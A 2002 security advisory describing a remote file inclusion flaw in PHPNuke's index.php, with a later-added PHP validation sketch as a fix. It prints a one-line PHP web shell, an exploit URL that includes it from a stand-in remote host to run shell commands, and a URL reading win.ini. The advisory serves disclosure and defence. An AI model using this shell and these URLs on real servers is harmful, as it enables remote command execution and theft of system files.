
PHPNuke - Index.php allows arbitrary PHP remote command execution
17th Jan 2002 [SBWID-5006]
COMMAND

	Index.php allows arbitrary PHP remote command execution

SYSTEMS AFFECTED

	PHPNuke v??

PROBLEM

	"Nopman" says:

	The flaw is in the index.php's include file feature. It allows
	including files like index.php?file=file. It prevents users including
	..'s in URLs, but it didn't prevent users from entering
	http://-urls. Remember the PHP's remote get feature...
	

	 Exploit

	 =======

	

	Upload this file to some free web space provider or set up your own
	server:
	

	<?php

	system($cmd);

	?>

	

	Then just requesting 

	http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al

	will execute ls -al command.

	

	

	 Update (25 January 2002)

	 ======

	

	RoMAnSoft added that the following url would allow access to win.ini
	file:

	http://victimserver/index.php?file=c:\winnt\win.ini

	

SOLUTION

	Set allow_url_fopen to off in php.ini
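
	allow_url_fopen only governs URL wrappers, so it stops the http:// include but not the local-path read in the update. The sketch below is an added example (not PHPNuke's code and not part of the original advisory) of validating the file parameter before it reaches include; resolve_include, the pages directory and the page names are hypothetical.

```php
<?php
// Added example, not PHPNuke code. Directory and page names are assumptions.

/**
 * Resolve a user-supplied ?file= value to a local file that is safe to include.
 * Returns the absolute path, or null when the request must be rejected.
 */
function resolve_include(string $requested, string $baseDir, array $allowed): ?string
{
    // 1. Allowlist: only names the application itself registered are accepted.
    //    This rejects http:// URLs, c:\winnt\win.ini and ../ sequences alike.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }

    // 2. Defence in depth: canonicalise and confirm the target is inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // missing file or missing base directory
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the pages directory
    }
    return $path;
}

// Constructed demonstration: a temporary pages directory with one legitimate page.
$pagesDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo_' . getmypid();
@mkdir($pagesDir);
file_put_contents($pagesDir . DIRECTORY_SEPARATOR . 'news.php', "<?php echo 'news';\n");
$allowed = ['news', 'faq'];

$samples = [
    'news',                                       // legitimate page
    'http://where.the.bad.php.file.is/evil.php',  // remote URL from the advisory
    'c:\\winnt\\win.ini',                         // absolute path from the update
    '../index',                                   // traversal attempt
    'faq',                                        // allowlisted, but file is missing
];
foreach ($samples as $s) {
    $r = resolve_include($s, $pagesDir, $allowed);
    printf("%-45s => %s\n", $s, $r === null ? 'REJECTED' : 'include ' . basename($r));
}

// Clean up the constructed demo directory.
unlink($pagesDir . DIRECTORY_SEPARATOR . 'news.php');
rmdir($pagesDir);
```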
